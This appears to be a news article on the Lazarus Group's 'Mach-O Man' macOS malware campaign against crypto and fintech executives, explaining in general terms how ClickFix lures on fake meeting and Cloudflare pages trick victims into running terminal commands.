Lazarus Group, a cybercrime syndicate long associated with North Korea, is shifting its focus from traditional banking heists to major attacks on the cryptocurrency and fintech industries. Since 2017, analysts estimate Lazarus has been responsible for thefts totaling $6.7 billion. The group’s latest operation, dubbed “Mach-O Man,” is specifically targeting executives and businesses across digital finance, exploiting new vulnerabilities to access vast sums in digital assets.
Mach-O Man targets crypto and fintech leaders
Natalie Newson, a blockchain security expert at CertiK, has been closely monitoring Lazarus Group’s operations within crypto and fintech. In just the last two weeks, Lazarus stole upwards of $500 million in digital assets from platforms such as Drift and KelpDAO. Investigators stress that the Mach-O Man campaign is not an isolated incident but a coordinated mission backed and orchestrated at the state level by North Korea.
This sophisticated approach singles out both institutions and top executives in crypto and finance. Experts now see North Korea’s digital theft as a systemic, state-run revenue source. There is also growing concern among security professionals that variations of the Mach-O Man technique could be adopted by other criminal organizations worldwide.
How ClickFix social engineering exploits work
The hallmark of the Mach-O Man attack is its use of modular macOS malware, developed by Lazarus’s “Chollima” subunit and designed to compromise crypto and fintech applications on Apple systems. According to Newson, the malware is delivered through a targeted social engineering ploy known as “ClickFix.”
Attackers contact executives via Telegram, sending urgent meeting requests. Victims are then redirected to deceptively authentic sites mimicking known platforms like Zoom, Microsoft Teams, or Google Meet. They are told connection issues require them to paste a provided command into their terminal, unwittingly granting hackers direct access to corporate systems and financial assets.
Newson explains that “the page appears entirely legitimate, and the instructions seem routine—the victim initiates the action themselves, so conventional security checks rarely detect the attack.”
DeFi projects face heightened risks
Mach-O Man’s sophistication has raised alarm throughout the sector, posing serious threats to both organizations and individuals—particularly in the DeFi landscape. Security researcher Vladimir S. reports that attackers have even seized control of DeFi project domains, replacing original websites with fraudulent Cloudflare prompts that instruct users to execute malicious commands for “authentication.”
This tactic leverages convincing prompts so well that most users, including senior staff, comply without hesitation, inadvertently opening the door for total platform compromise. The malware is engineered to erase itself rapidly, leaving virtually no digital footprints and making forensic tracing extremely difficult.
Newson observes, “Most victims never realize they’ve been breached. Even if they do, it’s almost impossible to identify which variant infiltrated their systems.”
Specialists warn that Lazarus Group’s attacks are no longer episodic news items—they now represent a persistent, high-stakes threat to the entire crypto ecosystem. Those active within fintech and digital currency realms are urged to increase both technical and social vigilance to preempt future incursions.
